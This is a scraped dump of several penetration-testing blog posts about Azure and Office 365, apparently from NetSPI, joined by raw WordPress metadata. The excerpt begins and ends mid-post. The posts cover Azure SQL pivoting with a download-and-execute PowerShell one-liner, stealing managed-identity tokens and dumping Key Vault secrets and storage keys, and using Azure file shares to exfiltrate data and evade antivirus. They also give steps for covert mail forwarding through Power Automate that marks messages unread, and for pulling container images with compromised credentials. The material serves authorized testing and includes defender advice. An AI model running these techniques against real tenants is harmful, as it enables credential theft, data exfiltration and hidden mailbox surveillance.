Similar to the Storage Accounts, you may find connection strings for Azure SQL in the configuration files or environmental variables. Most Azure SQL servers that I encounter have access locked down to specific IP ranges, so you may not be able to remotely access the servers from the internet. Every once in a while, we'll find a server with 0.0.0.0-255.255.255.255 in their allowed list, but that's pretty rare.

Azuresql

Since direct SQL access from the internet is unlikely, we will need an alternative that works from within the App Services host.

Azure SQL from Windows:

For Windows, we can plug in the values from our connection string and make use of PowerUpSQL to access Azure SQL databases.

Confirm Access to the "sql-test" Database on the "netspi-test" Azure SQL server:

D:homesitewwwroot>powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1'); Get-SQLConnectionTest -Instance 'netspi-test.database.windows.net' -Database sql-test -Username MyUser -Password 123Password456 | ft -wrap"


ComputerName                     Instance                         Status    
------------                     --------                         ------    
netspi-test.database.windows.net netspi-test.database.windows.net Accessible

Execute a query on the "sql-test" Database on the "netspi-test" Azure SQL server:

D:homesitewwwroot>powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1'); Get-SQLQuery -Instance 'netspi-test.database.windows.net' -Database sql-test -Username MyUser -Password 123Password456 -Query 'select @@version' | ft -wrap"


Column1                                                                        
-------                                                                        
Microsoft SQL Azure (RTM) - 12.0.2000.8                                        
    Jul 31 2020 08:26:29                                                          
    Copyright (C) 2019 Microsoft Corporation

From here, you can modify the query to search the database for more information.

For more ideas on pivoting via Azure SQL, check out the PowerUpSQL GitHub repository and Scott Sutherland's NetSPI blog author page.

Azure SQL from Linux:

For Linux hosts, you will need to check the stack that you're running (Node, Python, PHP, .NET Core, Ruby, or Java). In your shell, "printenv | grep -i version" and look for things like RUBY_VERSION or PYTHON_VERSION.

For simplicity, we will assume that we are set up with the Python Stack and pyodbc is already installed as a module. For this, we will use a pretty basic Python script to query the database.

Other stacks will (most likely) require some different scripting or clients that are more compatible with the provided stack, but we'll save that for another blog.

Execute a query on the "sql-test" Database on the "netspi-test" Azure SQL server:

root@567327e35d3c:/home# cat sqlQuery.py
import pyodbc
server = 'netspi-test.database.windows.net'
database = 'sql-test'
username = 'MyUser'
password = '123Password456'
driver= '{ODBC Driver 17 for SQL Server}'

with pyodbc.connect('DRIVER='+driver+';SERVER='+server+';PORT=1433;DATABASE='+database+';UID='+username+';PWD='+ password) as conn:
        with conn.cursor() as cursor:
                cursor.execute("SELECT @@version")
                row = cursor.fetchone()
                while row:
                        print (str(row[0]))
                        row = cursor.fetchone()

root@567327e35d3c:/home# python sqlQuery.py
Microsoft SQL Azure (RTM) - 12.0.2000.8
        Jul 31 2020 08:26:29
        Copyright (C) 2019 Microsoft Corporation

Your best bet for deploying this script to the host is probably downloading it from a remote source. Trying to manually edit Python from the Azure web based SSH connection is not going to be a fun time.

More generally, trying to do much of anything in these Linux hosts may be tricky. For this blog, I was working in a sample app that I spun up for myself and immediately ran into multiple issues, so your mileage may vary here.

For more information about using Python with Azure SQL, check out Microsoft's documentation.

Abusing Managed Identities to Get Tokens

An application/VM/etc. can be configured with a Managed Identity that is given rights to specific resources in the subscription via IAM policies. This is a handy way of granting access to resources, but it can be used for lateral movement and privilege escalation.

We've previously covered Managed Identities for VMs on the Azure Privilege Escalation Using Managed Identities blog post. If the application is configured with a Managed Identity, you may be able to use the privileges of that identity to pivot to other resources in the subscription and potentially escalate privileges in the subscription/tenant.

In the next section, we'll cover getting tokens for a Managed Identity that can be used with the management.azure.com REST APIs to determine the resources that your identity has access to.

Getting Tokens

There are two different ways to get tokens out of your App Services application. Each of these depend on different versions of the REST API, so depending on the environmental variables that you have at your disposal, you may need to choose one or the other.

*Note that if you're following along in the Console, the Windows commands will require writing that token to a file first, as Curl doesn't play nice with the Console output.

Windows:

  • MSI Secret Option:
curl "%MSI_ENDPOINT%?resource=https://management.azure.com&api-version=2017-09-01" -H secret:%MSI_SECRET% -o token.txt
type token.txt
  • X-IDENTITY-HEADER Option:
curl "%IDENTITY_ENDPOINT%?resource=https://management.azure.com&api-version=2019-08-01" -H X-IDENTITY-HEADER:%IDENTITY_HEADER% -o token.txt
type token.txt

Linux:

  • MSI Secret Option:
curl "$MSI_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$MSI_SECRET
  • X-IDENTITY-HEADER Option:
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER

For additional reference material on this process, check out the Microsoft documentation.

These tokens can now be used with the REST APIs to gather more information about the subscription. We could do an entire post covering all of the different ways you can gather data with these tokens, but here's a few key areas to focus on.

Accessing Key Vaults with Tokens

Using a Managed Identity token, you may be able to pivot over to any Key Vaults that the identity has access to. In order to retrieve these Key Vault values, we will need a token that's scoped to vault.azure.net. To get this vault token, use the previous process, and change the "resource" URL to https://vault.azure.net.

I would recommend setting two tokens as variables in PowerShell on your own system (outside of App Services):

$mgmtToken = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSU…"
$kvToken = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSU…"

And then pass those two variables into the following MicroBurst functions:

Get-AzKeyVaultKeysREST -managementToken $mgmtToken -vaultToken $kvToken -Verbose
Get-AzKeyVaultSecretsREST -managementToken $mgmtToken -vaultToken $kvToken -Verbose

These functions will poll the subscription for any available Key Vaults, and attempt to read keys/secrets out of the vaults. In the example below, our Managed Identity only had access to one vault (netspi-private) and one secret (TestKey) in that vault.

Keyvault

Accessing Storage Accounts with Tokens

Outside of any existing storage accounts that may be configured in the app (See Above), there may be additional storage accounts that the Managed Identity has access to.

Use the Get-AZStorageKeysREST function within MicroBurst to dump out any additional available storage keys that the identity may have access to. This was previously covered in the Gathering Bearer Tokens from Azure Services blog, but you will want to use a token scope to management.azure.com with this function.

Get-AZStorageKeysREST -token YOUR_TOKEN_HERE

As previously mentioned, we could do a whole series on the different ways that we could use these Managed Identity tokens, so keep an eye out for future posts here.

Conclusion

Got a shell on an Azure App Services host? Don't assume that the cloud has (yet again) solved all the security problems in the world. There are plenty of options to potentially pivot from the App Services host, and hopefully you can use one of them from here.

From a defender's perspective, I have a couple of recommendations:

  • Test your web applications regularly
  • Utilize the Azure Web Application Firewalls (WAF) to help with coverage
  • Configure your Managed Identities with least privilege
    • Consider architecture that allows other identities in the subscription to do the heavy lifting
    • Don't give subscription-wide permissions to Managed Identities

Prior Work

I've been working on putting this together for a while, but during that time David Okeyode put out a recording of a presentation he did for the Virtual Azure Community Day that pretty closely follows these attack paths. Check out David's video for a great walkthrough of a real life scenario.

For other interesting work on Azure tokens, Tenant enumeration, and Azure AD, check out Dirk-jan Mollema's work on his blog. - https://dirkjanm.io/

[post_title] => Lateral Movement in Azure App Services [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => lateral-movement-azure-app-services [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:26:40 [post_modified_gmt] => 2023-03-16 14:26:40 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11728 [menu_order] => 469 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [24] => WP_Post Object ( [ID] => 11720 [post_author] => 10 [post_date] => 2020-07-29 07:00:30 [post_date_gmt] => 2020-07-29 07:00:30 [post_content] =>

Get-AzPasswords is a function within the MicroBurst toolkit that's used to get passwords from Azure subscriptions using the Az PowerShell modules. As part of this, the function supports gathering passwords and certificates that are attached to automation accounts.

These credentials can be stored in a few different ways:

  • Credentials - Username/Password combinations
  • Connections - Service Principal accounts that you can assume the identity of
  • Certificates - Certs that can be used in the runbooks

If you have the ability to write and run runbooks in an automation account, each of these credentials can be retrieved in a usable format (cleartext or files). All of the stored automation account credentials require runbooks to retrieve, and we really only have one easy option to return the credentials to Get-AzPasswords: print the credentials to the runbook output as part of the extraction script.

The Problem

The primary issue with writing these credentials to the runbook job output is the availability of those credentials to anyone that has rights to read the job output.

Ctcreds

By exporting credentials through the job output, an attacker could unintentionally expose automation account credentials to lesser privileged users, resulting in an opportunity for privilege escalation. As responsible pen testers, we don't want to leave an environment more vulnerable than it was when we started testing, so outputting the credentials to the output logs in cleartext is not acceptable.

The Solution

To work around this issue, we've implemented a certificate-based encryption scheme in the Get-AzPasswords function to encrypt any credentials in the log output.

The automation account portion of the Get-AzPasswords function now uses the following process:

  1. Create a new self-signed certificate (microburst) on the system that is running the function
  2. Export the public certificate to a local file
  3. Encode the certificate file into a base64 string to use in the automation runbook
  4. Decode the base64 bytes to a cer file and import the certificate in the automation account
  5. Use the certificate to encrypt (Protect-CmsMessage) the credential data before it's written to the output
  6. Decrypt (Unprotect-CmsMessage) the output when it's retrieved on the testing system
  7. Remove the self-signed cert and remove the local file from the testing system

This process protects the credentials in the logs and in transit. Since each certificate is generated at runtime, there's less concern of someone decrypting the credential data from the logs after the fact.

The Results

Those same credentials from above will now look like this in the output logs:

Enccreds

On the Get-AzPasswords side of this, you won't see any difference from previous versions. Any credentials gathered from automation accounts will still be available in cleartext in the script output, but now the credentials will be protected in the output logs.

For anyone making use of Get-Azpasswords in MicroBurst, make sure that you grab the latest version from NetSPI's GitHub - https://github.com/NetSPI/MicroBurst

[post_title] => Get-AzPasswords: Encrypting Automation Password Data [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => encrypting-password-data-in-get-azpasswords [to_ping] => [pinged] => [post_modified] => 2023-04-28 13:31:40 [post_modified_gmt] => 2023-04-28 18:31:40 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11720 [menu_order] => 476 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [25] => WP_Post Object ( [ID] => 11709 [post_author] => 10 [post_date] => 2020-07-16 07:00:53 [post_date_gmt] => 2020-07-16 07:00:53 [post_content] =>

For many years, pentester-hosted SMB shares have been a common technology to use during internal penetration tests for getting tools over to, and data off of, target systems. The process is simple: share a folder from your testing system, execute a "net use z: testingboxtools" from your target, and run your tools from the share.

For a long time, this could be used to evade host-based protection software. While this is all based on anecdotal evidence… I believe that this was mainly due to the defensive software being cautious with network shares. If AV detects a payload on a shared drive (“Finance”), and quarantines the whole share, that could impact multiple users on the network.

As we’ve all continued to migrate up to the cloud, we’re finding that SMB shares can still be used for testing, and can be augmented using cloud services. As I previously mention on the NetSPI blog, Azure services can be a handy way to bypass outbound domain filters/restrictions during assessments. Microsoft-hosted Azure file shares can be used, just like the previously mentioned on-prem SMB shares, to run tools and exfiltrate data.

Setting Up Azure File Shares

Using Azure storage accounts, it’s simple to set up a file share service. Create a new account in your subscription, or navigate to the Storage Account that you want to use for your testing and click the “+ File Share” tab to create a new file share.

For both the file share and the storage account name, I would recommend using names that attempt to look legitimate. Ultimately the share path may end up in log files, so something along the lines of hackertools.file.core.windows.netpayloads may be a bad choice.

Connecting to Shares

After setting up the share, mapping the drive from a Windows host is pretty simple. You can just copy the PowerShell code directly from the Azure Portal.

Or you can simplify things, and you can remove the connectTestResult commands from the above command:

cmd.exe /C "cmdkey /add:`"STORAGE_ACCT_NAME.file.core.windows.net`" /user:`"AzureSTORAGE_ACCT_NAME`" /pass:`"STORAGE_ACCT_KEY`""
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\STORAGE_ACCT_NAME.file.core.windows.net\tools" | out-null

Where STORAGE_ACCT_NAME is the name of your storage account, and STORAGE_ACCT_KEY is the key used for mapping shares (found under “Access Keys” in the Storage Account menu).

I've found that the connection test code will frequently fail, even if you can map the drive. So there's not a huge benefit in keeping that connection test in the script.

Now that we have our drive mapped, you can run your tools from the drive. Your mileage may vary for different executables, but I’ve recently had luck using this technique as a way of getting tools onto, and data out of, a cloud-hosted system that I had access to.

Removing Shares

As for clean up, we will want to remove the added drive when we are done, and remove any cmdkeys from our target system.

Remove-PSDrive -Name Z
cmd.exe /C "cmdkey /delete:`"STORAGE_ACCT_NAME.file.core.windows.net`""

It also wouldn’t hurt to cycle those keys on our end to prevent the old ones from being used again. This can be done using the blue refresh button from the “Access Keys” section in the portal.

To make this a little more portable for a cloud environment, where we may be executing PowerShell on VMs through cloud functions, we can just do everything in one script:

cmd.exe /C "cmdkey /add:`" STORAGE_ACCT_NAME.file.core.windows.net`" /user:`"Azure STORAGE_ACCT_NAME`" /pass:`" STORAGE_ACCT_KEY`""
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\STORAGE_ACCT_NAME.file.core.windows.net\tools" | out-null

# Insert Your Commands Here

Remove-PSDrive -Name Z
cmd.exe /C "cmdkey /delete:`"STORAGE_ACCT_NAME.file.core.windows.net`""

*You may need to change the mapped PS Drive letter, if it’s already in use.

I was recently able to use this in an AWS environment with the Run Command feature in the AWS Systems Manager service, but this could work anywhere that you have command execution on a host, and want to stay off of the local disk.

Conclusion

The one big caveat for this methodology is the availability of outbound SMB connections. While you may assume that most networks would disallow outbound SMB to the internet, it’s actually pretty rare for us to see outbound restrictions on SMB traffic from cloud provider (AWS, Azure, etc.) networks. Most default cloud network policies allow all outbound ports and protocols to all destinations. So this may get more mileage during your assessments against cloud hosts, but don't be surprised if you can use Azure file shares from an internal network.

[post_title] => Azure File Shares for Pentesters [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-file-shares-for-pentesters [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:27:15 [post_modified_gmt] => 2023-03-16 14:27:15 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11709 [menu_order] => 480 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [26] => WP_Post Object ( [ID] => 11569 [post_author] => 10 [post_date] => 2020-06-25 07:00:40 [post_date_gmt] => 2020-06-25 07:00:40 [post_content] =>

During a recent Office 365 assessment, we ran into an interesting situation where Exchange was configured to disallow any external domain forwarding rules. This configuration is intended to prevent attackers from compromising an account and setting up forwarding for remote mail access and persistence. Part of this assessment was to validate that these configurations were properly implemented, and also to look for potential bypasses for this configuration.

Power Automate

As part of the Office 365 environment, we had access to the Power Automate application. Formerly known as Microsoft Flow, Power Automate is a framework for gluing together multiple services for automation tasks within Office 365.

Want to get an email every time someone uploads a file to your shared OneDrive folder? Connect Outlook and OneDrive in Power Automate and set up a flow. I like to think of it as IFTTT for the Microsoft ecosystem.

Forwarding Email

Since we were able to create connections and flows in Power Automate, we decided to connect Power Automate to Office 365 Outlook and create a flow for forwarding email to a NetSPI email address.

You can use the following process to set up external mail forwarding with Power Automate:

1. Under the Data menu, select "Connections".

Connections

2. Select "New Connection" at the top of the window, and find the "Office 365 Outlook" connection.

Newconnection

3. Select "Create" on the connection and authorize the connection under the OAuth pop-up.

4. Navigate to the "Create" section from the left navigation menu, and select "Automated flow".

Start

5. Name the flow (OutlookForward) and search for the "When a new email arrives (V3)" Office 365 Outlook trigger.

Build

6. Select any advanced options and add a new step.

Newstep

7. In the added step, search for the Office 365 Outlook connection, and find the "Forward an email (V2)" action.

Addedstep

8. From the "Add dynamic content" link, find "Message Id" and select it for the Message Id.

Messageid

9. Set your "To" address to the email address that you'd like to forward the message to.

10. Optional, but really recommended - Add one more step "Mark as read or unread (V2)" from the Office 365 Outlook connection, and mark the message as Unread. This will hopefully make the forwarding activity less obvious to the compromised account.

Unread

11. Save the flow and wait for the emails to start coming in.

You can also test the flow in the editor. It should look like this:

Success

Taking it further

While forwarding email to an external account is handy, it may not accomplish the goal that we're going for.

Here are a few more ideas for interesting things that could be done with Power Automate:

  • Use "Office 365 Users - Search for users (V2)" to do domain user enumeration
    • Export the results to an Excel file stored in OneDrive
  • Use the enumerated users list as targets for an email phishing message, sent from the compromised account
    • Watch an inbox for the template message, use the message body as your phishing email
  • Connect "OneDrive for Business" and an external file storage provider (Dropbox/SFTP/Google Drive) to mirror each other
    • When a file is created or modified, copy it to Dropbox
  • Connect Azure AD with an admin account to create a new user
    • Trigger the flow with an email to help with persistence.

Fixing the Issue

It looks like it is possible to disable Power Automate for users, but you may have legitimate reasons for using it. Alternatively, Microsoft Flow audit events are available in the Office365 Security & Compliance center, so you can at least log and alert on the creation of new flow.

For anyone looking to map these activities back to the Mitre ATT&CK framework, check out these links:

Prior Work

Some related prior Microsoft Flow related research was presented at DerbyCon in 2019 by Trent Lo - https://www.youtube.com/watch?v=80xUTJPlhZc

[post_title] => Bypassing External Mail Forwarding Restrictions with Power Automate [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => bypassing-forwarding-restrictions-power-automate [to_ping] => [pinged] => [post_modified] => 2023-06-13 09:48:53 [post_modified_gmt] => 2023-06-13 14:48:53 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11569 [menu_order] => 486 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [27] => WP_Post Object ( [ID] => 11564 [post_author] => 10 [post_date] => 2020-05-12 07:00:00 [post_date_gmt] => 2020-05-12 07:00:00 [post_content] =>

Azure Container Registries are Microsoft's solution for managing Docker images in the cloud. The service allows for authentication with AzureAD credentials, or an "Admin user" that shares its name with the registry.

Acrinfo

For the purposes of this blog, let's assume that you've compromised some Admin user credentials for an Azure Container Registry (ACR). These credentials may have been accidentally uploaded to GitHub, found on a Jenkins server, or discovered in any number of random places that you may be able to find credentials.

Alternatively, you may have used the recently updated version of Get-AzPasswords, to dump out ACR admin credentials from an Azure subscription. If you already have rights to do that, you may just want to skip to the end of this post to see the AZ CLI commands that you can use instead.

Acrpass

The credentials will most likely be in a username/password format, with a registry URL attached (EXAMPLEACR.azurecr.io).

Now that you have these credentials, we'll go through next steps that you can take to access the registry and (hopefully) escalate your privileges in the Azure subscription.

Logging In

The login portion of this process is really simple. Enter the username, registry URL, and the password into the following docker command:

docker login -u USER_NAME EXAMPLEACR.azurecr.io

If the credentials are valid, you should get a "Login Succeeded".

Enumerating Container Images and Tags

In order to access the container images, we will need to enumerate the image names and available tags. Normally, I would do this through an authenticated AZ CLI session (see below), but since we only have the ACR credentials, we will have to use the Docker Registry APIs to do this.

For starters we will use the "_catalog" API to list out all of the images for the registry. This needs to be done with authentication, so we will use the ACR credentials in a Basic Authorization (Base64[USER:PASS]) header to request "https://EXAMPLEACR.azurecr.io/v2/_catalog".

Sample PowerShell code:

Basicauth

Now that we have a list of images, we will want to find the current tags for each image. This can be done by making additional API requests to the following URL (where IMAGE_NAME is the one you want the tags for) - https://EXAMPLEACR.azurecr.io/v2/IMAGE_NAME/tags/list

Sample PowerShell code:

Enumtags

To make this whole process easier, I've wrapped the above code into a PowerShell function (Get-AzACR) in MicroBurst to help.

PS C:> Get-AzACR -username EXAMPLEACR -password A_$uper_g00D_P@ssW0rd -registry EXAMPLEACR.azurecr.io
docker pull EXAMPLEACR.azurecr.io/arepository:4
docker pull EXAMPLEACR.azurecr.io/dockercore:1234
docker pull EXAMPLEACR.azurecr.io/devabcdefg:2020
docker pull EXAMPLEACR.azurecr.io/devhijklmn:4321
docker pull EXAMPLEACR.azurecr.io/imagetester:10
docker pull EXAMPLEACR.azurecr.io/qatestimage:1023
...

As you can see above, this script will output the docker commands that can run to "pull" each image (with the first available tag).

Important note: the first tag returned by the APIs may not be the latest tag for the image. The API is not great about returning metadata for the tags, so it's a bit of a guessing game for which tag is the most current. If you want to see all tags for all images, just use the -all flag on the script.

Append the output of the script to a .ps1 file and run it to pull all of the container images to your testing system (watch your disk space). Alternatively, you can just pick and choose the images that you want to look at one at a time:

PS C:> docker pull EXAMPLEACR.azurecr.io/dockercore:1234
1234: Pulling from dockercore
[Truncated]
6638d86fd3ee: Download complete
6638d86fd3ee: Pull complete
Digest: sha256:2c[Truncated]73
Status: Downloaded image for EXAMPLEACR.azurecr.io/dockercore:1234
EXAMPLEACR.azurecr.io/dockercore:1234

Fun fact - This script should also work with regular docker registries. I haven't had a non-Azure registry to try this against yet, but I wouldn't be surprised if this worked against a standard Docker registry server.

Running Docker Containers

Once we have the container images on our testing system, we will want to run them.

Here's an example command for running a container from the dockercore image with an interactive entrypoint of "/bin/bash":

docker run -it --entrypoint /bin/bash EXAMPLEACR.azurecr.io/dockercore:1234

*This example assumes bash is an available binary in the container, bash may not always be available for you

With access to the container, we can start looking at any local files, and potentially find secrets in the container.

Real World Example

For those wondering how this could be practical in the real world, here's an example from a recent Azure cloud pen test.

  1. Azure Storage Account exposed a Terraform script containing ACR credentials
  2. NetSPI connected to the ACR with Docker
  3. Listed out the images and tags with the above process
  4. NetSPI used Docker to pull images from the registry
  5. Ran bash shells on each image and reviewed available files
  6. Identified Azure storage keys, Key Vault keys, and Service Principal credentials for the subscription

TL;DR - Anonymous access to ACR credentials resulted in Service Principal credentials for the subscription

Using the AZ CLI

If you already happen to have access to an Azure subscription where you have ACR reader (or subscription reader) rights on a container registry, the AZ CLI is your best bet for enumerating images and tags.

From an authenticated AZ CLI session, you can list the registries in the subscription:

PS C:> az acr list
[
{
"adminUserEnabled": true,
"creationDate": "2019-09-17T20:42:28.689397+00:00",
"id": "/subscriptions/d4[Truncated]b2/resourceGroups/ACRtest/providers/Microsoft.ContainerRegistry/registries/netspiACR",
"location": "centralus",
"loginServer": "netspiACR.azurecr.io",
"name": "netspiACR",
[Truncated]
"type": "Microsoft.ContainerRegistry/registries"
}
]

Select the registry that you want to attack (netspiACR) and use the following command to list out the images:

PS C:> az acr repository list --name netspiACR
[
"ACRtestImage"
]

List tags for a container image (ACRtestImage):

PS C:> az acr repository show-tags --name netspiACR --repository ACRtestImage
[
"latest"
]

Authenticate with Docker

PS C:> az acr login --name netspiACR
Login Succeeded

Once you are authenticated, have the container image name and tag, the "docker pull" process will be the same as above.

Conclusion

Azure Container Registries are a great way to manage Docker images for your Azure infrastructure, but be careful with the credentials. Additionally, if you are using a premium SKU for your registry, restrict the access for the ACR to specific networks. This will help reduce the availability of the ACR in the event of the credentials being compromised. Finally, watch out for Reader rights on Azure Container Registries. Readers have rights to list and pull any images in a registry, so they may have more access than you expected.

[post_title] => Attacking Azure Container Registries with Compromised Credentials [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-acrs-with-compromised-credentials [to_ping] => [pinged] => [post_modified] => 2021-06-08 22:00:23 [post_modified_gmt] => 2021-06-08 22:00:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11564 [menu_order] => 501 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [28] => WP_Post Object ( [ID] => 18419 [post_author] => 53 [post_date] => 2020-04-16 15:47:52 [post_date_gmt] => 2020-04-16 20:47:52 [post_content] =>
Watch Now

Overview 

As organizations continue to move to the cloud for hosting applications and development, security teams must protect multiple attack surfaces, including the applications and cloud infrastructure. Additionally, attackers are automated and capable. While these attackers continuously probe and find access or vulnerabilities on many different levels, their success usually results from human error in code or infrastructure configurations, such as open admin ports and overprivileged identity roles. 

Learn how to better secure both the application layer and cloud infrastructure, using both automated tools and capable penetration testers to uncover logic flaws and other soft spots. Karl Fosaaen, Practice Director at NetSPI, and Mike Rothman, President at DisruptOps, share how to find and remediate your own vulnerabilities more efficiently before attackers do.

Key highlights: 

Common Pentesting Requirements 

Cloud adoption has seen a notable increase over the past five to 10 years and continues to accelerate. From an application pentesting perspective, a business may already have standard application pentesting requirements as part of the development process.  

Here’s an overview of common pentesting requirements: 

  • Application Testing 
    • Recently ported legacy applications 
    • New applications 
    • Recent or upcoming code pushes 
    • Web/mobile/thick client
  • Network Testing 
    • Internal network 
    • External network 
    • Segmentation testing (PCI)  

Now, a lot of legacy applications are being ported up into cloud environments. This opens a variety of potential vulnerabilities because of the cloud infrastructure that's being used, in addition to the fact that a lot of new applications are being built native in the cloud. 

As new applications are built, security concerns emerge that may not necessarily be taken into consideration. Because of this, pentesting is an effective method to help identify potential security concerns.

Every time new code pushes come up or new developments are made to cloud applications, pentesting those applications as they’re being deployed is important to identify new issues that may arise from an application standpoint. One consideration to keep in mind is that not only are web applications involved in the cloud, but also many mobile applications and thick client applications are hosted in the cloud, allowing new security issues to emerge.

On the network side, more external IPs and internal infrastructure are also being hosted in the cloud, which requires network pentesting.

How do we Pentest “The Cloud?”

When it comes to pentesting the cloud, a best practice is to complete application and network pentesting, as has been the case in the past, and add in a cloud configuration review to take a deeper dive into how services are being configured and used.

Steps to pentest the cloud:

  • With permission, including read access for configurations with the cloud provider to have an in-depth view of networks and applications hosted in the cloud environment 
  • Traditional network/app testing 
    • Traditional vulnerability/port scanners 
    • Nessus, Nmap, Burp Suite, etc. 
  • Cloud configuration review 
    • Automated tools to dump configurations and find issues 
    • Manual review of console/portal interfaces

Focus Services in Cloud Pentesting

From a pentesting and configuration review perspective, some of the most important services include:  

  • Virtual machines 
    • Virtual machine infrastructure as a service is one of the key services that’s seeing issues from as long as 10 years ago that are reemerging with cloud environments. Understanding how these services are configured and making sure everything is properly set up is critical. 
  • Serverless code 
    • Serverless code is something worth diving deeper into to learn how the code is executed and run. Similar problems appear across all the different cloud providers from a serverless code perspective and it’s important to see how permissions are applied across different services. 
  • Platform users and groups 
    • How permissions are applied (IAM) 
    • Integrations with identity providers (IDPs/Federation/SSO) 
  • (Potentially) public-facing PaaS services 
    • Web application services 
    • Database services 
    • Data storage

How to Scope your Cloud Pentest  

The next step is understanding how to effectively plan or scope your cloud pentest to secure cloud assets. Some steps to consider include:

  • Gather counts of resources in your environment  
    • Numbers of: 
      • Virtual machines 
      • Public IPs 
      • PaaS services 
  • Include public-facing IPs in your external ranges 
    • Beware of dynamic IPs 
  • Include application testing as part of your scope 
  • Complete a separate cloud environment pentest 
    • Scope should cover app/network/configuration

The Security Hamster Wheel of Pain 

Many businesses are stuck on an endless hamster wheel of pain from a risk management perspective. This is an endless cycle of the following stages:  

  • Ignorance is bliss 
  • Am I hosed?  
  • Yes, the vendor’s tools prove it 
  • Sheer panic 
  • “Fix” problems 

Rather than being stuck on this wheel, businesses need to think more strategically about security operations and understand the reality that the environment is a lot more complicated, and developments are happening a lot faster.

Why is Cloud Security at Scale Hard?

Cloud security is challenging to scale due to several factors, including:

  • Complexity: Hundreds of cloud services and tens of thousands of resources spread across multiple cloud accounts. 
  • Speed of change: DevOps and agile approaches have led to frequent and even continuous change. 
  • Human error: Lack of human expertise and tools leaves issues undetected and unresolved. 
  • Automated attackers: Exposed cloud resources are rapidly discovered and exploited by automated attacks.

Capabilities to Look for in a Cloud SecOps Platform 

A Cloud SecOps platform can help your organization get off the security hamster wheel of pain and improve your overall cloud security.

Top capabilities to look for in a Cloud SecOps platform include:  

  • Serverless: DisruptOps is fully cloud-native and serverless for cloud-scale support. 
  • Event-driven: Internal architecture is completely event-driven for both internal and external events.  
  • Software-as-a-Service (SaaS): DisruptOps is a fully multi-tenant SaaS application. 
  • Secure by design: Security is baked in, including an advanced least-privilege provisioning system.

The Key to Automation: Decisions 

In the past, automation was often a security concern because there were many instances of automation running awry and taking down half a network – or similar examples. However, automation has since become more widely adopted.

As part of the DisruptOps platform, the team built a chatbot that integrates with Slack and Microsoft Teams. The chat sends an alert of any security concerns, along with any actions the team needs to take. Alerts can also be delayed by a set time window, such as 15 minutes or an hour, if a team member doesn’t have time to address the issue right away. Human-integrated automation puts power in the hands of decision-makers.

Top Down Meets Bottom Up 

The decision technology, chatbots, and ability to have humans involved in the process can help increase team members’ comfort with automation. This is an example of when top-down meets bottom-up. Steps include:

  • Identify the issue 
  • Remediate once 
  • Automate 
  • Continuous assessment

Secure Cloud Environments with NetSPI Cloud Penetration Testing 

As cloud environments continue to evolve and expand, and cybercriminals become more sophisticated, organizations are at risk of vulnerabilities, configuration issues, and other threats.  

NetSPI’s Cloud Penetration Testing services can help identify vulnerabilities in cloud infrastructure, reduce organizational risk, and improve cloud security. Our expert cloud pentesters follow manual and automated penetration testing processes and focus on configuration review, external cloud pentesting, and internal network pentesting.  

Learn more about NetSPI’s Cloud Penetration Testing services or schedule a demo with our team to learn more.

[wonderplugin_video iframe="https://youtu.be/4B9ZTgwkReM" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Securing The Cloud: Top Down and Bottom Up [post_excerpt] => As organizations continue to move to the cloud for hosting applications and development, security teams must protect multiple attack surfaces, including the applications and cloud infrastructure. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => securing-the-cloud-top-down-and-bottom-up [to_ping] => [pinged] => [post_modified] => 2023-10-05 17:23:13 [post_modified_gmt] => 2023-10-05 22:23:13 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=18419 [menu_order] => 77 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [29] => WP_Post Object ( [ID] => 11373 [post_author] => 10 [post_date] => 2020-04-16 07:00:44 [post_date_gmt] => 2020-04-16 07:00:44 [post_content] => In the previous Azure Managed Identities blog, we covered some simple proof of concept examples for using Azure Virtual Machine Managed Identities to escalate privileges in an Azure subscription. The example code relied on Azure OAuth bearer tokens that were generated from authenticating to the Azure metadata service. Since posting that blog, we've found a handful of other places in Azure that generate similar types of bearer tokens that can used with the publicly available REST APIs during pen tests. In this follow up post, we will cover how to collect bearer tokens from additional services and introduce a new scripts section in MicroBurst that can be used with these tokens to gather Azure information, and/or escalate privileges in an 